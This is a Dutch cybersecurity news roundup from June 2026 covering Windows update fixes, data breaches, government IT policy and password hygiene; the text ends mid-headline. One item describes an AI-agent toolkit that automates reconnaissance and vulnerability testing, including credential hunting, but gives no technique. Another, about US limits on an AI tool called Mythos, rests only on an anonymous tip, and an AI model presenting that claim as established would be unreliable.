Microsoft heeft een bekend probleem verholpen dat sinds mei 2025 Windows updates deed mislukken wanneer deze via de Windows Update Standalone Installer (WUSA) vanaf een netwerkshare werden geïnstalleerd. WUSA is een ingebouwde commandoregeltool van Windows die beheerders helpt bij het installeren en verwijderen van Microsoft Standalone Update (.msu) bestanden via de Windows Update Agent API, om zo patches, updates en hotfixes te implementeren of te verwijderen.

Het probleem trof specifiek Windows 11 versies 24H2 en 25H2, en Windows Server 2025 apparaten binnen bedrijfsnetwerken. Dit komt doordat WUSA geen gebruikelijke methode is voor het installeren van updates op thuisapparaten. Microsoft benadrukte ook dat de fout niet optrad bij één enkel .msu bestand of wanneer de bestanden lokaal waren opgeslagen.

Volgens Microsoft konden Windows updates die met WUSA waren geïnstalleerd, mislukken met de foutcode ERROR_BAD_PATHNAME. Dit gebeurde wanneer de update werd uitgevoerd via WUSA of door te dubbelklikken op een .msu bestand vanaf een netwerkshare die meerdere .msu bestanden bevatte. Microsoft erkende het probleem voor het eerst in augustus 2025 en gaf aan dat het kon optreden op apparaten die updates hadden geïnstalleerd die waren uitgebracht op 28 mei 2025 (KB5058499) en later.

Het softwarebedrijf heeft het probleem aanvankelijk automatisch beperkt op thuis- en niet-beheerde zakelijke apparaten door middel van een Known Issue Rollback Group Policy, die in september 2025 werd uitgerold. Als onderdeel van de Patch Tuesday van juni 2026 heeft Microsoft dit probleem definitief opgelost voor alle getroffen systemen in cumulatieve updates. Voor Windows 11 betreft dit update KB5079391 en voor Windows Server 2025 update KB5094125.

Als tijdelijke oplossing adviseerde Microsoft gebruikers die een update van vóór de fixdatum gebruikten en het probleem ondervonden, om de .msu bestanden lokaal op het apparaat op te slaan en de update vanaf die locatie te installeren. Ook werd aangeraden om na het opnieuw opstarten van Windows, na de installatie van een .msu bestand via WUSA, minstens 15 minuten te wachten voordat de Update History pagina in Instellingen werd gecontroleerd. Na deze korte vertraging zou de Instellingen app correct moeten aangeven of de update succesvol was geïnstalleerd.

Dit is niet het enige updategerelateerde probleem dat Microsoft recentelijk heeft moeten aanpakken. Eerder in april 2025 loste het bedrijf een probleem op dat zakelijke klanten verhinderde om de veiligheidsupdates van april 2025 te installeren via Windows Server Update Services (WSUS). Ook een identieke bug die zorgde voor het mislukken van de Windows 11 updates van augustus 2025 met 0x80240069 fouten, werd verholpen. Bovendien waarschuwde Microsoft deze week klanten dat ze problemen kunnen ondervinden bij het installeren van de nieuwste maandelijkse updates op sommige Windows apparaten die zijn geüpgraded naar Windows 11 24H2 of 25H2.

 

Bron: Microsoft

13 juni 2026 | Belastingdienst beheert btw-systeem zelf na risicoanalyse

De Belastingdienst heeft besloten het beheer van het btw-systeem niet uit te besteden aan het Amerikaanse ICT-bedrijf Fast Enterprises. Staatssecretaris Eerenberg van Financiën heeft de Tweede Kamer hierover geïnformeerd. Oorspronkelijk was het plan dat Fast Enterprises het totale systeem, inclusief software en infrastructuur, zou beheren. De infrastructuur bevindt zich in Apeldoorn en zou door Fast worden beheerd via een housing oplossing die door de Belastingdienst geleverd wordt.

In maart meldde Eerenberg nog dat er maatregelen waren getroffen om de risico's van beheer door een Amerikaans bedrijf te beperken. Tegelijkertijd werd een risicoanalyse uitgevoerd en onderzocht of de Belastingdienst het beheer en onderhoud van de infrastructuur zelf kon overnemen, het zogenaamde hosting scenario.

De afgeronde risicoanalyse heeft uitgewezen dat de risico's met betrekking tot de vertrouwelijkheid van gegevens en de continuïteit van de dienstverlening in het housing scenario onvoldoende gemitigeerd konden worden, met name gezien de huidige geopolitieke context. Als gevolg hiervan heeft de Belastingdienst besloten om voor ingebruikname van het nieuwe systeem over te stappen op het hosting scenario.

In dit hosting scenario zal de Belastingdienst zelf het beheer en onderhoud van de infrastructuur verzorgen. De servers zullen in de datacenters van de fiscus staan en beheerd worden door eigen medewerkers, in plaats van door Fast Enterprises. De combinatie van deze aanpak met reeds aangekondigde beheersmaatregelen wordt geacht de risico's voor continuïteit en vertrouwelijkheid voldoende te mitigeren.

Tevens komt het softwaredistributiemechanisme onder controle van de Belastingdienst, wat de controle over de toegang tot de software en de bijbehorende data waarborgt. Hoewel Fast Enterprises verantwoordelijk blijft voor de software oplossing, zal het bedrijf geen directe toegang hebben tot de productiegegevens. Dit stelt de Belastingdienst in staat om de risico's rondom data toegang door de leverancier en de continuïteit van de dienstverlening tot een aanvaardbaar niveau te brengen.

De keuze voor het hosting scenario leidt wel tot vertraging bij de implementatie van de VAT-refund regeling, die oorspronkelijk voor 1 juli gepland stond. Ondernemers die gebruikmaken van deze regeling worden hierover gelijktijdig met de Kamerbrief geïnformeerd. Volgens Eerenberg zullen ondernemers geen problemen of extra kosten ondervinden en kunnen zij op de huidige wijze aangifte blijven doen totdat het nieuwe systeem geïmplementeerd is.

Tot slot heeft de Belastingdienst een 'backdoorcheck' laten uitvoeren op de broncode van het systeem door een externe partij, welke geen bevindingen heeft opgeleverd. Voorafgaand aan de implementatie van het nieuwe systeem zullen de risico's, mitigerende maatregelen en de aanvaardbaarheid van de restrisico's worden onderworpen aan een audit door een nog te selecteren externe partij.

 

Bron: Tweede Kamer

14 juni 2026 | BugHunter toolkit brengt gratis AI naar bug bounty onderzoek

Een nieuwe open-source toolkit genaamd BugHunter, ontworpen voor bug bounty jagers, wint aan populariteit binnen de beveiligingsonderzoeksgemeenschap. De toolkit, oorspronkelijk gebouwd op Anthropic's Claude Code, is nu uitgebreid met ondersteuning voor gratis AI-providers zoals Ollama en Groq, waardoor de drempel voor onafhankelijke onderzoekers aanzienlijk wordt verlaagd. BugHunter automatiseert de volledige pijplijn voor het ontdekken en rapporteren van kwetsbaarheden.

De tool is ontwikkeld door beveiligingsonderzoeker Shuvon Md Shariar Shanaz en wordt gehost op GitHub. BugHunter bestrijkt alle fasen van een bug bounty operatie, van subdomein-enumeratie en live host-detectie tot kwetsbaarheidstesten voor meer dan 20 Web2- en 10 Web3-bugklassen. Het omvat ook validatie van bevindingen via een '7-Question Gate' en het genereren van indieningsklare rapporten voor platforms zoals HackerOne, Bugcrowd, Intigriti en Immunefi, allemaal uitvoerbaar met één enkel terminalcommando.

Aanvankelijk was BugHunter beperkt tot gebruikers met een Claude Code- of Claude Pro-abonnement. De nieuwste update maakt het echter een volledig zelfstandige CLI-tool, de `thebughunter`-opdracht, die wordt aangedreven door gratis en voordelige AI-providers. De ondersteuning voor gratis providers omvat Ollama, die volledig offline en lokaal draait zonder kosten, en Groq, met een gratis clouddienst en zeer hoge inferentiesnelheden. Daarnaast zijn DeepSeek (ongeveer $0.001 per 1.000 tokens) en de betaalde Claude API/OpenAI-modellen beschikbaar. BugHunter detecteert providers automatisch in een prioriteitsvolgorde (Ollama → Groq → DeepSeek → Claude → OpenAI) en kiest de meest kostenefficiënte optie. Onderzoekers kunnen op elk moment van provider wisselen via `bughunter setup`.

Na installatie biedt de toolkit een gestructureerde CLI die een professionele bug bounty workflow weerspiegelt. De '7-Question Gate', die wordt uitgevoerd tijdens de `validate`-opdracht, is ontworpen om zwakke of dubbele bevindingen te elimineren voordat een onderzoeker tijd verspilt met indiening. Intern coördineert de toolkit ongeveer 35 scanningtools, waaronder `subfinder`, `httpx`, `nuclei`, `katana`, `ffuf` en `dalfox`. Ontbrekende tools worden daarbij elegant overgeslagen zonder harde fouten te veroorzaken.

Een technisch opmerkelijke functie is de persistentie van geheugen over verschillende sessies. BugHunter logt bevindingen en ontdekte patronen in een JSONL-gebaseerde geheugenopslag, waardoor kwetsbaarheidspatronen die op één doelwit zijn geïdentificeerd, als context kunnen dienen bij het testen van een nieuw doelwit. De sessiestatus blijft behouden na herstarts, zodat onderzoekers onderbroken hunts kunnen hervatten en niet-geteste eindpunten kunnen prioriteren via `bughunter pickup target.com`.

Naast traditionele webapplicatietesten omvat BugHunter een speciale auditmodus voor smart contracts, die 10 kwetsbaarheidsklassen bestrijkt, waaronder re-entrancy, flash loan aanvallen, oracle-manipulatie en proxy-/upgradefouten. Een token-auditor-module scant ook op 'rug pull'-indicatoren, mint-autoriteit, LP-lock-status, honeypot-detectie en bonding curve-anomalieën, wat relevant is voor Web3-programma's in de stijl van Immunefi.

Negen gespecialiseerde AI-agenten behandelen individuele taken binnen de pijplijn. Het gaat om een recon-agent, rapportschrijver, validator, Web3-auditor, chain builder, autopilot, recon ranker, token-auditor en credential hunter met ingebouwde juridische vangrails die activiteiten zoals 'credential spraying' hard stoppen. De toolkit kan worden geïnstalleerd als een Claude Code-plugin, een zelfstandige CLI of in alternatieve agent-harnassen zoals OpenCode, Pi Agent en Codex, wat het een van de meest veelzijdige open-source aanbiedingen maakt op het gebied van AI-ondersteunde bug bounty automatisering die momenteel op GitHub beschikbaar is.

 

Bron: Shuvon Md Shariar Shanaz | Bron 2: github.com

15 juni 2026 | Raad van Europa naar verluidt getroffen door omvangrijk datalek

De Raad van Europa is naar verluidt het slachtoffer geworden van een datalek, waarbij meer dan 297 gigabyte aan gevoelige personeelsgegevens en salarisgegevens zou zijn buitgemaakt. Het zou gaan om ruim 429.000 bestanden, zo blijkt uit recente dreigingsinformatie. De afpersersgroep ShinyHunters heeft de aanval opgeëist en dreigt de gegevens openbaar te maken als de organisatie niet op de eisen ingaat. De exacte methode van de aanval is vooralsnog onbekend.

Het vermeende datalek volgt op een reeks aanvallen op Europese instellingen in 2026. Eerder dit jaar, in maart, werd de Europese Commissie getroffen door een groot datalek dat eveneens door ShinyHunters werd opgeëist, waarbij gegevens van tientallen Europese entiteiten werden buitgemaakt. De opeenstapeling van dergelijke incidenten bij prominente Europese organen onderstreept de aanhoudende en toenemende dreiging voor de digitale infrastructuur in Europa.

De buitgemaakte gegevens van de Raad van Europa, bestaande uit personeelsgegevens en salarisgegevens, kunnen ernstige gevolgen hebben. Dergelijke informatie omvat vaak persoonlijke gegevens van medewerkers, zoals namen, adressen, bankrekeningnummers en salarisoverzichten. Een lek van deze omvang kan leiden tot risico's zoals identiteitsdiefstal, gerichte phishing, financiële fraude en chantage richting de getroffen personen. Voor de instelling zelf kan een dergelijk incident leiden tot reputatieschade, juridische procedures en aanzienlijke kosten voor herstel en het voldoen aan privacywetgeving zoals de AVG.

De Raad van Europa, die zich inzet voor mensenrechten, democratie en de rechtsstaat in Europa, heeft nog geen officiële verklaring afgelegd over het vermeende incident.

 

Bron: Cybercrimeinfo

15 juni 2026 | België test cybercrisisrespons tijdens Europese oefening Cyber Europe 2026

Het Centre for Cybersecurity Belgium (CCB) heeft deelgenomen aan Cyber Europe 2026, de grootschalige Europese oefening voor cybercrisisbeheer die wordt gecoördineerd door het Europese agentschap voor cyberbeveiliging ENISA. De oefening vond plaats op 10 en 11 juni en bracht cyberspecialisten uit de publieke en private sector, beleidsmakers, Europese instellingen en partnerlanden samen.

De editie van 2026 richtte zich op de spoorsector en de maritieme transportsector. In het scenario werd een grootschalige cyberaanval op de Europese spoorwegen en scheepvaartnetwerken nagespeeld, die zware operationele verstoringen veroorzaakte en uitgroeide tot een volwaardige cybercrisis. Deelnemers moesten onder realistische omstandigheden samenwerken om de aanval in te dammen en de gevolgen te beperken.

Voor Europa was deze oefening ook de eerste grootschalige test van het Europese cyberdraaiboek uit 2025. Dat draaiboek beschrijft welke rollen en verantwoordelijkheden de verschillende partijen hebben wanneer een cyberincident over de landsgrenzen heen escaleert. België leverde een bijdrage aan de ontwikkeling van het scenario, zodat de oefening realistische uitdagingen weerspiegelde en zowel de nationale als de Europese crisisprocedures op een samenhangende manier kon testen.

Naast de lidstaten namen ook specialisten uit het Verenigd Koninkrijk, Noorwegen, Zwitserland en Oekraïne deel. De keuze voor de transportsector is voor België veelzeggend. Onder de organisaties die onder de richtlijn NIS2 vallen, behoort transport tot de zwaarst getroffen sectoren, samen met openbaar bestuur, energie en de zorg. Oefeningen als Cyber Europe helpen overheden en bedrijven om hun samenwerking en draaiboeken te testen voordat een echte crisis zich voordoet.

 

Bron: CCB

16 juni 2026 | Microsoft kampt met verlopen certificaat op belangrijke connectiviteitswebsite

Microsoft heeft te maken met een blunder in certificaatbeheer, nadat een domein dat wereldwijd door systeembeheerders wordt gebruikt om de connectiviteit met Microsoft 365 te testen, maandag begon met het genereren van waarschuwingen voor niet-vertrouwde verbindingen in browsers.

Het domein `connectivity.office.com`, een veelgebruikt hulpmiddel voor IT-professionals om de netwerkconnectiviteit met Microsoft 365 te verifiëren en te bevestigen dat firewalls geen kritieke Microsoft-diensten blokkeren, toont nu een `NET::ERR_CERT_DATE_INVALID`-fout in Chromium-gebaseerde browsers.

Het certificaat, uitgegeven door `Microsoft Azure RSA TLS Issuing CA 07`, is verlopen op zondag 14 juni 2026, om 08:38:02 UTC. Het was voor het laatst vernieuwd op 16 december 2025, wat betekent dat het slechts een geldigheidsduur van zes maanden had die Microsoft niet tijdig heeft verlengd. De browserwaarschuwing geeft expliciet aan: "Deze server kon niet bewijzen dat het connectivity.office.com is; het beveiligingscertificaat is 2 dagen geleden verlopen."

De certificaatviewer bevestigt dat het domein eigendom is van Microsoft Corporation, met een SHA-256-vingerafdruk van het TLS-certificaat van `c52ca2abaffcb192ef02ff7c131504d32b0311024c4ec7f8a439c44f17347baa`. Een SSL-serverrapport van maandag bevestigde de vervaldatum en toonde aan dat het certificaat precies 180 dagen geldig was voordat het zonder verlenging verliep.

Het domein `connectivity.office.com` is specifiek ontworpen om IT-teams en netwerkingenieurs van bedrijven te helpen bij het diagnosticeren van connectiviteitsproblemen met Microsoft 365. Het test of firewalls, proxy's of netwerkapparatuur het verkeer naar Microsoft servers verstoren. Nu het certificaat is verlopen, markeren browsers de site als niet-vertrouwd. Dit kan ertoe leiden dat geautomatiseerde tools of scripts die afhankelijk zijn van HTTPS-verbindingen met dit eindpunt, stilzwijgend falen of fouten in de certificaatvalidatie veroorzaken, waardoor diagnostische workflows worden onderbroken. Organisaties die dit eindpunt gebruiken in netwerkcontroles of onboardingscripts worden direct getroffen.

Dit incident is des te opmerkelijker gezien de gelijktijdige nadruk van Microsoft op certificaathygiëne. Het bedrijf dringt er momenteel bij zakelijke klanten op aan om verouderde Secure Boot-certificaten uit 2011 te vernieuwen, voorafgaand aan hun eigen vervaldatum in juni-oktober 2026. Het laten verlopen van het TLS-certificaat van een openbaar, IT-kritisch domein staat in contrast met die richtlijnen. Fouten in het beheer van de certificaatlevenscyclus behoren tot de meest te voorkomen beveiligingsmisconfiguraties. Geautomatiseerde verlengingssystemen, die Microsoft zelf promoot via Azure, zijn juist bedoeld om dergelijke missers te voorkomen.

Microsoft heeft ten tijde van de publicatie van dit artikel nog geen openbare verklaring afgelegd over het verlopen certificaat. De verwachting is dat het bedrijf het certificaat op korte termijn zal vernieuwen, gezien de operationele zichtbaarheid van het getroffen domein.

 

Bron: Microsoft

16 juni 2026 | Australië vernieuwt belangrijke beveiligingsrichtlijnen

De Australische overheid werkt aan een actualisatie van haar essentiële beveiligingsmaatregelen om systemen en gegevens van organisaties beter te beschermen. Dit volgt negen jaar na de introductie van de 'Essential Eight' door het Australische Cyber Security Centre (ACSC). Deze acht maatregelen waren destijds ontworpen om de overgrote meerderheid van cyberaanvallen te voorkomen.

De oorspronkelijke Essential Eight omvatten het patchen van applicaties en besturingssystemen, het implementeren van multifactorauthenticatie (MFA), het beperken van administratorrechten, het controleren van de uitvoering van bestanden zoals executables, libraries, scripts en installers, het beperken van Microsoft Office macro's, het 'hardenen' van applicaties en het regelmatig maken van back-ups.

Sinds de lancering begin 2017 heeft de technologische wereld aanzienlijke ontwikkelingen doorgemaakt, met de introductie van diverse nieuwe systemen en technologieën. Deze veranderingen maken een aanpassing van het bestaande advies noodzakelijk. Als reactie hierop heeft de ACSC een concept 'Essentials' framework ontwikkeld. Dit nieuwe framework is gebaseerd op de Information Security Manual (ISM) en biedt specifiek advies voor omgevingen die gebruikmaken van moderne technologieën.

Een belangrijk aspect van het herziene advies is de onderverdeling in verschillende toepassingsgebieden, wat organisaties meer flexibiliteit moet bieden bij de implementatie. De autoriteiten benadrukken echter dat de fundamentele principes van de Essential Eight onverminderd van kracht blijven. Australische organisaties die reeds de Essential Eight toepassen, zijn uitgenodigd om feedback te geven op het voorgestelde nieuwe Essentials framework. Uitgebreide details over de precieze invulling van het framework zijn op dit moment nog niet publiekelijk beschikbaar.

 

Bron: Australische overheid | Bron 2: cyber.gov.au

16 juni 2026 | Europese privacytoezichthouder waarschuwt voor datalekken door 'shadow AI'

De Europese privacytoezichthouder EDPS (European Data Protection Supervisor) heeft een waarschuwing uitgegeven voor potentiële datalekken als gevolg van 'shadow AI'. Dit fenomeen verwijst naar het gebruik van ongeautoriseerde artificiële intelligentie (AI) tools door medewerkers binnen organisaties. Het ongecontroleerde gebruik van dergelijke tools kan leiden tot het omzeilen van cruciale maatregelen voor de bescherming van persoonlijke gegevens, waardoor gevoelige informatie terecht kan komen bij partijen die daar geen rechtmatige toegang toe hebben.

Wojciech Wiewiórowski, voorzitter van de EDPS, benadrukt de ernst van de situatie: "Wat een makkelijke manier lijkt om productiever te zijn, kan ernstige gevolgen hebben, waaronder datalekken, het niet voldoen aan regelgeving en operationele verstoringen die onopgemerkt blijven." Het gebruik van niet-goedgekeurde AI tools creëert een 'blinde vlek' voor toezichthouders, waarbinnen diverse risico's kunnen ontstaan. Zodra data in een ongeautoriseerd systeem is ingevoerd, wordt het volgens Wiewiórowski vrijwel onmogelijk om te traceren waar die informatie belandt, hoe deze wordt gebruikt en wie zijn modellen ermee traint.

Bovendien introduceren deze AI tools significante beveiligingsproblemen. Als voorbeeld worden tools genoemd die automatisch online vergaderingen opnemen, zonder dat de securityteams van een organisatie hiervoor expliciete toestemming hebben gegeven. Dit kan resulteren in 'onverwachte backdoors', aldus de EDPS-voorzitter.

De EDPS roept organisaties op om een helder beleid te formuleren ten aanzien van het gebruik van AI tools. Dit beleid moet vergezeld gaan van de implementatie van technische controles en continue monitoring. Specifieke aanbevelingen omvatten het blokkeren van domeinnamen van niet-toegestane AI tools, het instellen van 'data loss prevention' regels en het voorkomen dat eindpunten AI-software kunnen installeren die niet vooraf is goedgekeurd.

De meest effectieve oplossing is volgens de EDPS-voorzitter het aanbieden van platforms met AI die zowel veilig als compliant zijn en die voldoen aan de operationele behoeften van de medewerkers. Wiewiórowski sluit af met de mededeling dat het aanpakken van de risico's van 'shadow AI' een gezamenlijke verantwoordelijkheid is. Het vereist een constante en nauwe samenwerking tussen functionarissen gegevensbescherming, IT-afdelingen, securityteams en andere relevante afdelingen binnen de organisatie.

 

Bron: EDPS | Bron 2: adwiseacademy.nl

16 juni 2026 | Onveilige tijdelijke wachtwoorden vormen aanzienlijk risico bij onboarding

De onboarding van nieuwe medewerkers is een intensieve periode voor IT-teams, waarbij apparaten, accounts, toegangsrechten en wachtwoorden binnen een strak tijdsschema moeten worden geregeld. Vaak wordt hierbij een tijdelijk wachtwoord voor de eerste dag verstrekt, zodat nieuwe medewerkers toegang krijgen tot bedrijfssystemen. Het probleem is dat deze wachtwoorden niet altijd tijdelijk blijven. Ze kunnen via e-mail of sms worden verstuurd, hergebruikt worden voor meerdere accounts, of zelfs helemaal niet worden gewijzigd, wat onnodige risico's introduceert in het onboardingproces.

Voor aanvallers kunnen zwakke of slecht beheerde inloggegevens voor onboarding een gemakkelijke route bieden naar bedrijfssystemen. Om het onboardingproces veiliger te maken zonder nieuwe medewerkers te vertragen, is het cruciaal te begrijpen waarom typische methoden voor wachtwoorddeling risico's met zich meebrengen. De meest voorkomende aanpak is het versturen van initiële inloggegevens in platte tekst via e-mail of sms. Dit is snel en handig, maar creëert ook een duidelijk blootstellingspunt. Als deze berichten worden onderschept, doorgestuurd of geopend op een onbeveiligd apparaat, kunnen aanvallers onmiddellijke toegang krijgen tot bedrijfsaccounts en systemen.

Een alternatief is het mondeling delen van wachtwoorden, persoonlijk of telefonisch. Hoewel dit het risico op digitale onderschepping vermindert, brengt het operationele uitdagingen met zich mee. IT-teams en nieuwe medewerkers moeten hun schema's coördineren, en het proces loopt vaak spaak wanneer managers of derden worden gevraagd om inloggegevens namens IT door te geven. Hoe meer mensen een wachtwoord hanteren, hoe groter de kans op onjuist beheer of openbaarmaking. Geen van beide methoden biedt een bijzonder veilige of schaalbare manier om inloggegevens voor onboarding te beheren. Organisaties balanceren gemak van toegang tegen veiligheid, waardoor tijdelijke wachtwoorden vaak een zwakke plek op lange termijn worden in plaats van een kortstondige onboardingstap.

De meeste inloggegevens voor onboarding zijn bedoeld om tijdelijk te zijn, waarbij van medewerkers wordt verwacht dat zij na hun eerste aanmelding een nieuw wachtwoord aanmaken. Het is echter gemakkelijk voor drukke gebruikers om deze stap over te slaan en het wijzigen van hun wachtwoord uit te stellen. Onboarding workflows kunnen ook nalaten een reset af te dwingen, of tijdelijke inloggegevens kunnen actief blijven zonder dat iemand het merkt. Dit creëert een probleem, omdat wachtwoorden voor de eerste dag zelden zijn ontworpen met beveiliging op lange termijn in gedachten. Ze zijn eenvoudiger, voorspelbaarder of in bulk gegenereerd om de onboarding te versnellen. Als deze inloggegevens actief blijven, worden ze een gemakkelijk doelwit voor aanvallers die op zoek zijn naar laagdrempelige manieren om toegang te krijgen tot bedrijfssystemen.

Recente incidenten tonen aan hoe gevaarlijk ongewijzigde standaard of tijdelijke inloggegevens kunnen zijn, vooral wanneer ze worden blootgesteld op systemen die aan het internet zijn gekoppeld of zijn gekoppeld aan gevoelige gebruikersgegevens. In november 2023 werd de gemeentelijke waterautoriteit van Aliquippa in Pennsylvania, VS, aangevallen door de aan Iran gelinkte hacktivistengroep Cyber Av3ngers. De hackers misbruikten programmeerbare logische controllers (PLC's) die waren beveiligd met het standaardwachtwoord "1111", waardoor zij controle kregen over een afgelegen pompstation dat twee gemeenten bediende. Hoewel er geen risico was voor de watervoorziening, werd de ernst van het risico benadrukt door CISA, die andere faciliteiten waarschuwde om de standaardinloggegevens in vergelijkbare systemen te updaten en PLC's los te koppelen van het open internet.

Een ander incident in 2025 betrof het door AI aangedreven wervingsplatform McHire van McDonald's. Onderzoekers ontdekten dat dit platform, beheerd door Paradox.ai, toegankelijk was via een zwak verouderd beheerdersaccount dat naar verluidt "123456" gebruikte als zowel gebruikersnaam als wachtwoord. Via deze standaardinloggegevens kregen de onderzoekers toegang tot een testomgeving voor restaurants binnen het McHire-platform, waarvandaan zij chatinteracties konden bekijken die waren gekoppeld aan meer dan 64 miljoen sollicitaties. Paradox.ai reageerde snel na de verantwoorde openbaarmaking van het probleem, loste de kwetsbaarheid op en actualiseerde haar beveiligingsbeleid. Dit incident onderstreept hoe gemakkelijk vergeten standaard- of testinloggegevens ernstige blootstelling kunnen creëren wanneer ze verbonden blijven met actieve systemen.

Om deze risico's te verminderen, zijn gespecialiseerde oplossingen beschikbaar die de noodzaak om wachtwoorden voor de eerste dag te distribueren volledig wegnemen. In plaats van een tijdelijke inlogcode via e-mail, sms of telefoon te ontvangen, stellen nieuwe medewerkers hun eigen wachtwoord in via een beveiligd inschrijvingsproces. Gebruikers ontvangen een inschrijvingslink via hun persoonlijke e-mail, sms-bericht of een "wachtwoord resetten"-optie op hun aan het domein gekoppelde apparaat. Na het verifiëren van hun identiteit met behulp van een persoonlijk e-mailadres of mobiel nummer, kunnen zij vanaf het begin een wachtwoord creëren dat voldoet aan het beleid van de organisatie. Dit verkleint het risico op onderschepte of verkeerd beheerde inloggegevens voor onboarding en vereenvoudigt het proces voor zowel IT-teams als nieuwe medewerkers. Wachtwoorden zullen de komende tijd niet verdwijnen; zelfs met de groeiende populariteit van passkeys en wachtwoordloze authenticatie, spelen wachtwoorden nog steeds een centrale rol in de meeste onboarding- en toegangsbeheerprocessen. Organisaties moeten daarom veilige en betrouwbare manieren hebben om inloggegevens gedurende hun gehele levenscyclus te beheren.

 

Bron: CISA | Bron 2: waterisac.org | Bron 3: ian.sh

16 juni 2026 | Gemeente Groningen onderzoekt overstap van Windows naar Linux

De gemeente Groningen onderzoekt samen met de Vereniging van Nederlandse Gemeenten (VNG) de mogelijkheden om Windows te vervangen door Linux als besturingssysteem voor de werkplekken van ambtenaren. Dit initiatief komt voort uit een streven naar grotere digitale soevereiniteit en het verminderen van de afhankelijkheid van niet-Europese techbedrijven.

Wethouder Philip Broeksma maakte de plannen bekend tijdens het Politiek Vragenuur van de Groningse gemeenteraad. De Volt-fractie had hierbij vragen gesteld over de mate van afhankelijkheid van cloud- en softwareleveranciers buiten Europa, en hoe de gemeente deze afhankelijkheid actief wil afbouwen. Er werd specifiek gevraagd of er een plan is om de relatie met Microsoft te heroverwegen en of er actief alternatieven worden onderzocht.

Broeksma lichtte toe dat de gemeente Groningen in vergelijking met andere gemeenten al relatief weinig gebruikmaakt van de cloudomgeving van Microsoft. Verder staat er later dit jaar een pilot gepland voor een alternatief voor Microsoft Office. Het onderzoek naar een volledige vervanging van Windows door Linux voor de gehele werkplek is een omvangrijke operatie, die volgens de wethouder vele jaren in beslag zal nemen en aanzienlijke investeringen in tijd en middelen vereist. Desondanks benadrukte Broeksma de ambitie van de gemeente: "We hebben dus al belangrijke stappen gezet en we gaan daar mee door. Digitale soevereiniteit is iets dat wij willen."

 

Bron: minbzk.github.io

17 juni 2026 | Trump blokkeert Europa's toegang tot krachtige AI software voor cyberbeveiliging

De krachtige AI software Mythos, ontworpen om Europa te beschermen tegen grootschalige cyberaanvallen, blijft voor de Europese Unie onbereikbaar. Hoewel er eerder groen licht leek te zijn voor toegang tot deze geavanceerde technologie, heeft Donald Trump besloten dat het model uitsluitend in de Verenigde Staten moet blijven. Deze beslissing heeft geleid tot frustratie binnen de EU, die de blokkade als discriminerend beschouwt.

Mythos wordt beschouwd als een potentieel cruciaal wapen met AI dat de verdediging tegen grootschalige cyberaanvallen aanzienlijk zou kunnen versterken. De ontwikkeling en het exclusieve behoud van dergelijke technologieën in de VS roepen vragen op over internationale samenwerking en de gelijke toegang tot essentiële cyberbeveiliging middelen. Zonder toegang tot deze software voelt Europa zich naar eigen zeggen "overgeleverd aan de wolven" in het voortdurend evoluerende dreigingslandschap van cybercriminaliteit.

De kwestie benadrukt de groeiende spanningen rond technologische soevereiniteit en de verdeling van geavanceerde defensieve capaciteiten tussen geopolitieke blokken. De EU zal moeten overwegen hoe zij haar cyberverdediging onafhankelijk kan versterken, nu de toegang tot potentieel levensreddende technologieën zoals Mythos wordt beperkt door politieke beslissingen.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

17 juni 2026 | Rijksoverheid plant uitrol .gov.nl voor veiligere websites en besparing

De Rijksoverheid werkt aan een plan om de domeinnaamextensie .gov.nl verplicht te stellen voor alle overheidswebsites. Dit heeft staatssecretaris Van der Burg van Binnenlandse Zaken bekendgemaakt in een brief aan de Tweede Kamer. Het initiatief heeft als primair doel de herkenbaarheid van officiële overheidscommunicatie te vergroten en Nederlanders beter te beschermen tegen phishing, fraude en andere vormen van misleiding.

Volgens Van der Burg heeft de huidige "wildgroei aan domeinnamen" geleid tot een situatie waarin het afzenderschap van overheidswebsites en e-mails vaak onduidelijk is. Hierdoor lopen jaarlijks tienduizenden Nederlanders het risico op schade. Het ontbreken van een uniek en betrouwbaar overheidskenmerk dat niet eenvoudig te kopiëren of na te maken is, bemoeilijkt de directe herkenning van officiële overheidsbronnen. Een uniforme domeinnaamextensie zoals .gov.nl zou bijdragen aan meer consistentie, herkenbaarheid en een betere grip op het digitale domeinlandschap van de overheid.

De Tweede Kamer sprak in maart al de wens uit voor één domeinextensie voor overheidssites, een motie die breed werd aangenomen. Eerder onderzoek in opdracht van het ministerie van Binnenlandse Zaken toonde aan dat burgers overheidswebsites beter herkennen bij gebruik van een uniforme extensie. In 2023 nam het kabinet reeds een principebesluit, waarbij .gov.nl werd gekozen als de aparte extensie voor overheidssites.

Een uitgevoerde impactanalyse heeft de haalbaarheid, uitvoerbaarheid en betaalbaarheid van een uniforme domeinnaamextensie in kaart gebracht. Deze analyse bevestigt dat .gov.nl de herkenbaarheid vergroot, de consistentie verbetert en de grip op het digitale domeinlandschap van de overheid verstevigt. Bovendien wordt de uitgifte van domeinnamen centraal gecoördineerd, wat de mogelijkheid biedt om eisen te stellen aan veiligheid en toegankelijkheid, en zo nieuwe wildgroei te voorkomen.

De invoering van .gov.nl zal aanzienlijke organisatorische impact hebben door de versnippering van het huidige domeinlandschap, maar is technisch wel goed mogelijk. Er moet rekening worden gehouden met bestaande koppelingen, doorverwijzingen, certificaten, vindbaarheid en afhankelijkheden met andere systemen. De staatssecretaris benadrukt dat duidelijke kaders voor beleid, uitgifte, beheer, uitzonderingen en toezicht essentieel zijn.

Een belangrijke bevinding van het onderzoek is dat de kosten voor de invoering van .gov.nl aanzienlijk dalen wanneer deze wordt gecombineerd met het opschonen van het bestaande webportfolio. Door onnodige, dubbele of verouderde websites te saneren, hoeven deze niet allemaal te worden omgezet. Naar schatting kan vijftig tot zestig procent van de overheidswebsites van de Rijksoverheid worden opgeschoond of samengevoegd, wat leidt tot structurele besparingen van gemiddeld 23 miljoen euro per jaar. De eenmalige kosten voor het omzetten van de domeinen van de Rijksoverheid worden geschat op 24 miljoen euro, waardoor het traject zichzelf al na drie tot vijf jaar terugverdient.

De impactanalyse toont de noodzaak aan om het webportfolio van de overheid op orde te brengen. Later dit jaar zal een praktisch programmavoorstel voor de uitrol van .gov.nl worden uitgewerkt. Bij een definitief besluit zal de extensie eerst verplicht worden voor alle nieuwe websites van de Rijksoverheid. Vervolgens worden bestaande websites opgeschoond, waarna de overgebleven websites van het Rijk worden overgezet naar .gov.nl. Staatssecretaris Van der Burg heeft meer informatie later dit jaar aangekondigd.

 

Bron: Ministerie van Binnenlandse Zaken | Bron 2: tweedekamer.nl

17 juni 2026 | VK vereist ID of gezichtsscan voor nieuwe sociale media accounts

